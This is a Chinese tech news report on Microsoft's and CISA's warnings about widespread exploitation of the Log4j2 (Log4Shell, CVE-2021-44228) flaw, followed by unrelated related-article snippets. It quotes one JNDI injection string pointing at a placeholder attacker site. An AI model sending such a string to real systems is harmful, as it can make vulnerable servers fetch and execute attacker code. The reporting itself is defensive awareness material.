首页 > 业界 > 关键词  > 正文

微软警告比SolarWinds影响更深远的Log4j2漏洞利用

2021-12-16 10:32 · 稿源: cnbeta

微软再次发出了来自具有深厚背景的黑客组织的网络攻击预警,可知问题源于 Java 日志库的 Log4j2 漏洞(CVE-2021-44228)。这家雷德蒙德科技巨头指出,世界多地的黑客已开始利用这项更复杂的日志协议技术,来远程访问受害者的设备。目前观察到的大部分攻击,主要涉及各路人马的大规模扫描。

据悉,微软旗下的多个威胁情报团队 —— 包括 MSTIC 威胁情报中心、 Microsoft 365 Defender 威胁情报团队、RiskIQ 和 DART 检测响应团队 —— 一直在密切关注 Apache Log4j2 的远程代码执行(RCE)漏洞。

CVE-2021-44228 漏洞披露公告指出,被称作“Log4Shell”的漏洞攻击,往往在 Web 日志请求中包含如下字符串:

${jndi:ldap://[attacker site]/a}

美国网络安全和基础设施安全局(CISA)也证实了微软的说法,此前该机构同样通报了 Log4Shell 漏洞的广泛利用。

CISA 负责人 Jen Easterly 于昨日接受 CNN 采访时重申,若不迅速采取补救措施,各个联邦机构的设备、服务、乃至整个互联网,都将处于一个相当可怕的境地。

微软警告称,Log4j2 的风险源于两个方面。其一是漏洞可被轻松利用,其二是基于其构建的产品数量 —— 而 Apache Log4j2 就是当前最流行的 Java 日志库之一。

据悉,日志库用于为开发者提供有关服务和产品的附加信息,允许其控制在应用程序执行期间、用户登录特定服务 / 设备的错误报告,并在遇到功能问题时收集相关数据。

通过日志库的使用,开发者还可深入了解或收集设备详情,包括 CPU 类型 / GPU 型号、驱动程序版本、以及系统内存等。

攻击者会对使用 Log4j2 生成日志的目标系统执行 HTTP 请求,该日志利用 JNDI 向攻击者控制的站点执行请求,最终导致被利用的进程访问站点并执行有效负载。

在许多观察到的案例中,攻击者往往拿到了 DNS 日志系统的参数,旨在记录对站点的请求、以对易受攻击的系统进行指纹识别。

此前已知的一种漏洞利用,涉及微软旗下的《我的世界》服务器。攻击者以聊天框作为中部署的消息内容作为管道,试图渗透用户系统并夺得控制权。

事实上,全球许多知名企业都面临着巨大的风险,其中不乏微软、Twitter、苹果、亚马逊、百度、Cloudflare、网易、Cloudflare 等科技巨头。

网络安全公司 Check Point 指出,截至目前,其 GitHub 项目的下载量已经超过 40 万次。遗憾的是,尽管 Apache 已经发布了一个修补程序,但各家公司的实施方案不尽相同。

对于数百上千万的客户来说,这意味着他们仍将在未来一段时间里面临 Log4j 入侵风险,或导致大量用户数据暴露于在外。

举报

  • 相关推荐
  • 阳光新能源iSolarSim 2.0仿真软件:搭载AI智能体,开启对话式仿真!

    阳光新能源在2025SNEC展会上发布iSolarSim光伏发电仿真软件2.0版本,该软件搭载AI技术实现三大突破:1)首创"实景仿真双引擎",通过"精准实景+深度实景"双模式,将仿真精度提升2.5%;2)集成行业首个AI智能体,支持对话式仿真操作,计算效率提升90%;3)实现万级方案秒级寻优,3分钟完成万组设计方案仿真,效率提升千倍。软件覆盖地面电站、工商业及家庭光伏全场景,特别针对中国家庭光伏市场开发了人字坡/双面发电仿真等特色功能,其中双面仿真精度提升超2%。该解决方案有效解决了传统仿真软件精度不足、评估偏差大等行业痛点。

  • 如何用 DeepSeek 为产品创作slogan

    本文介绍如何利用DeepSeek工具高效创作优质产品slogan。首先在DeepSeek官网注册登录,输入详细指令如"为小米SU7创作5条突出性能/情感/社会价值的slogan";获取初稿后,通过补充指令反复优化调整,直至获得满意的5条高质量slogan。该方法能精准传达产品核心价值,吸引消费者目光,让原本费脑的slogan创作变得轻松高效。

  • 微软嘲讽苹果新 Liquid Glass 设计:“这不是 Windows Vista 吗?”

    苹果是不是“抄了” Vista,或许只能说一句:时代是个圈,UI 也是。

  • ColorOS陈希评iOS 26:缺席的AI是最大短板

    ColorOS设计总监陈希发文指出,iOS 26的最大短板依然是缺席的AI,但UI设计更新较大。 此前在去年的WWDC开发者大会上,苹果大肆宣传Apple Intelligence,不过从后续iOS 18的一系列更新来看,苹果在AI方面的表现并不成功,尤其是国行版,进度缓慢。 因此,在今年的WWDC大会上,关于AI的升级内容并不算很多,苹果软件工程高级副总Craig Federighi承认,Siri的AI功能短期内不会推出,因为�

  • 曝iPhone 17 Pro Logo下移:MagSafe要重新调整

    博主Majin Bu爆料称,iPhone 17 Pro和iPhone 17 Pro Max的苹果Logo下移,手机壳制造商也不得不重新调整MagSafe磁铁的位置。 据制造商透露,随着iPhone 17 Pro苹果Logo位置下移,磁铁阵列也向中心底部偏移,如果不调整就会出现MagSafe磁铁跟苹果Logo重叠的情况,影响美观。 此次调整主要是提升美观度,但是对配件制造商来说,磁铁位置的调整就需要对磁场再度进行校准,以避免细微干扰。

  • 最高网络安全标准,追觅扫地机获UL Solutions钻石级安全认证

    追觅X50系列扫地机器人获得UL Solutions颁发的"钻石级网络安全认证证书",成为全球首个获此认证的扫地机器人品牌。该认证表明产品在设备端防护、应用层数据加密、云端数据管理等全链路安全体系均达到国际最高标准。追觅还获得TÜV南德消费类物联网安全认证,构建起完善的安全防护体系。这些认证不仅验证了追觅产品的网络安全性能,更彰显了其在智能清洁赛道的核心竞争力。随着物联网安全要求提高,追觅构建的"全链路安全解决方案"或将成为行业重要参考,推动智能家居产业安全标准升级。

  • 史上变化最大iPhone!曝iPhone17苹果Logo位置改变:继续下移

    在外观设计方面,iPhone17Pro系列将采用横向大矩阵DECO。后置三摄被安排在左侧,闪光灯和LIDAR激光雷达扫描仪则位于矩阵相机右侧,整体外观与小米11Ultra有几分相似。 核心配置上,iPhone17Pro系列也有显著升级。该系列将首次配备12GB内存,并搭载全新的A19Pro芯片。与A18和A18Pro芯片相比,A19系列芯片将采用台积电第三代3nm制程N3P工艺。据相关数据,在相同功耗条件下,N3P工艺能使

  • macOS 26液态玻璃“致敬”Windows Vista:微软罕见贴脸嘲讽

    苹果正式发布了全新的macOS 26操作系统,其中采用了液态玻璃”(Liquid Glass)设计语言。 不有有不少人指出,这一设计与2006年Windows Vista的毛玻璃(Aero Glass)设计极为相似。 此前通常避免在竞争对手发布新产品时发表评论的微软,日前也在官方Instagram账号上发布了一段视频,并称就把它放这了”,调侃苹果的这一设计致敬”了Windows Vista。 微软发布的视频中,使用了#WindowsAer

  • 九章云极发布九章智算云Alaya NeW Cloud 2.0, 开创Serverless+RL技术趋势

    九章云极DataCanvas发布新一代全栈智能计算云平台Alaya NeW Cloud 2.0,突破"秒级生成百万token级"性能瓶颈,采用Serverless架构与强化学习技术深度融合,支持万卡级异构算力统一调度。平台创新性地提供高度融合的智能计算基础设施与低门槛工具链,实现端到端性能提升5倍,综合成本下降60%。同步推出全球首个强化学习计算服务AgentiCTRL,将大模型训练效率提升500%。该平台通过"按量计费"创新模式降低用户总拥有成本达60%,并构建覆盖全球的算力供给网络,推动AI普惠化发展。

  • 大脑协同小脑!小鹏G7行业首发智能驾驶辅助VLA-OL模型

    在今晚举办的发布会上,小鹏汽车首发智能驾驶辅助VLA-OL模型,首款落地车型即为全新G7。 该模型实现从小脑式反射”到 大脑 小脑”认知跃迁,小脑让汽车会开,大脑让汽车开好,如此整车具备主动思考、社会共识理解及自主学习能力。 以运动型大脑”和增强型小脑”,再加上不断自主强化学习的能力,未来将实现智能辅助驾驶能力比行业主流提升10-100倍,消除网络与地域